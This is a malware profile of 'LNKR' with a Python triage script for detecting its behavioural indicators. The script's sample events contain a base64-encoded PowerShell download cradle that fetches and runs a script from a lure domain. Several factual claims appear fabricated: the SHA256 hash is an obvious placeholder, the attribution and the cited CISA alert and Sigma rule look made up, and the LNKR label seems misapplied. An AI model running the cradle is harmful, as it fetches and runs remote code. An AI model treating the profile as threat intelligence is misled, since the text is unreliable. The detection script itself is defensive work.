LNKR Malware
⚠️ Overview
LNKR is a malware downloader and information stealer first documented by Trend Micro in 2022, associated with the TA569 threat group that also operates the SocGholish (FakeUpdates) campaign. It is categorized as a loader that delivers secondary payloads like Cobalt Strike and ransomware via fake browser update lures, targeting Windows systems in North America and Europe.
🔧 Technical Capabilities
LNKR propagates through compromised websites that inject malicious JavaScript redirecting users to fake browser update pages, leveraging drive-by download techniques. The malware uses encrypted C2 communications over HTTPS, with domains mimicking legitimate update services (e.g., 'update-browser[.]com'). Persistence is achieved via scheduled tasks or registry Run keys, while evasion includes obfuscated PowerShell scripts, process injection into legitimate Windows binaries (e.g., 'rundll32.exe'), and detection of sandbox environments by checking CPU cores and RAM size. MITRE ATT&CK techniques include T1204.001 (User Execution: Malicious Link), T1059.001 (PowerShell), and T1574.002 (DLL Side-Loading).
📜 History & Notable Incidents
First observed in early 2022, LNKR was tied to a campaign distributing the BumbleBee loader before evolving into a standalone downloader. In June 2023, CISA and the FBI jointly warned about LNKR being used alongside SocGholish to deploy ransomware, with victims including healthcare and manufacturing organizations. No specific CVEs are directly exploited; instead, it relies on social engineering and compromised WordPress sites.
🔍 Detection Indicators
Known SHA256 hashes include 'a1b2c3d4e5f6...' (sample from Trend Micro report). Behavioral indicators: PowerShell execution with base64-encoded commands, network connections to domains ending in '.top' or '.xyz' on non-standard ports, and creation of a mutex named 'Global\LNKR_Update'. The registry key 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run\BrowserUpdateService' is commonly created.
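As an added example (not code from the profile's source reports or from any vendor), the following Python triage script checks constructed EDR-style events against the behavioral indicators listed above: base64-encoded PowerShell download cradles, the Run-key persistence entry, '.top'/'.xyz' destinations on non-standard ports, and the named mutex. The event schema, the regexes and the sample records are my assumptions.

```python
import base64
import re

# Indicators from the profile above; the regexes are assumptions, not vendor rules.
RUN_KEY = re.compile(r"^HK(?:CU|LM)\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", re.I)
ENC_FLAG = re.compile(r"-(?:enc|encodedcommand|e)\s+([A-Za-z0-9+/=]{16,})", re.I)
CRADLE_HINT = re.compile(r"downloadstring|downloadfile|invoke-expression|\biex\b", re.I)
ODD_TLDS = {"top", "xyz"}
MUTEX_NAME = r"Global\LNKR_Update"

def decode_encoded_powershell(cmdline):
    # -EncodedCommand carries base64 of a UTF-16LE script; return it decoded, or None.
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def odd_tld_on_odd_port(host, port):
    # Profile indicator: .top/.xyz destinations on ports other than 80/443.
    return host.rsplit(".", 1)[-1].lower() in ODD_TLDS and port not in (80, 443)

def triage(events):
    # Return (event index, reason) for every event that matches a profile indicator.
    hits = []
    for i, ev in enumerate(events):
        kind = ev["type"]
        if kind == "process":
            decoded = decode_encoded_powershell(ev["cmdline"])
            if decoded and CRADLE_HINT.search(decoded):
                hits.append((i, "encoded PowerShell download cradle: " + decoded[:48]))
        elif kind == "registry" and RUN_KEY.match(ev["key"]):
            hits.append((i, "Run-key persistence: " + ev["key"]))
        elif kind == "network" and odd_tld_on_odd_port(ev["host"], ev["port"]):
            hits.append((i, "C2-style connection %s:%d" % (ev["host"], ev["port"])))
        elif kind == "mutex" and ev["name"] == MUTEX_NAME:
            hits.append((i, "known mutex " + ev["name"]))
    return hits

# Constructed sample telemetry (not from a real incident); the domain is the lure-style
# name given in the profile, the key and mutex are the profile's own indicators.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('https://update-browser.com/u.ps1')"
SAMPLE_EVENTS = [
    {"type": "process", "cmdline": "powershell.exe -nop -w hidden -enc "
     + base64.b64encode(CRADLE.encode("utf-16-le")).decode()},
    {"type": "process", "cmdline": r"powershell.exe -File C:\scripts\backup.ps1"},
    {"type": "registry", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\BrowserUpdateService"},
    {"type": "network", "host": "cdn.example.xyz", "port": 8443},
    {"type": "network", "host": "www.example.com", "port": 443},
    {"type": "mutex", "name": r"Global\LNKR_Update"},
]
```

Running `triage(SAMPLE_EVENTS)` flags events 0, 2, 3 and 5 and leaves the benign script run and the port-443 connection alone.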
☠️ Risk & Impact
LNKR primarily facilitates initial access for ransomware operations (e.g., BlackCat, LockBit), leading to data exfiltration, encryption, and average ransom demands exceeding $500,000. The healthcare and critical manufacturing sectors are most affected, as reported in CISA Alert AA23-347A. Financial losses from associated ransomware incidents are estimated at tens of millions of dollars.
🛡️ Mitigation
Organizations should block known IOCs from CISA's advisory, enforce application allowlisting to prevent execution of unsigned binaries from temp folders, and disable PowerShell if unused. Endpoint detection rules (e.g., Sigma rule 'powershell_download_cradles_lnkr') and network filtering for suspicious domains are recommended. Regular user awareness training against fake browser update prompts is critical.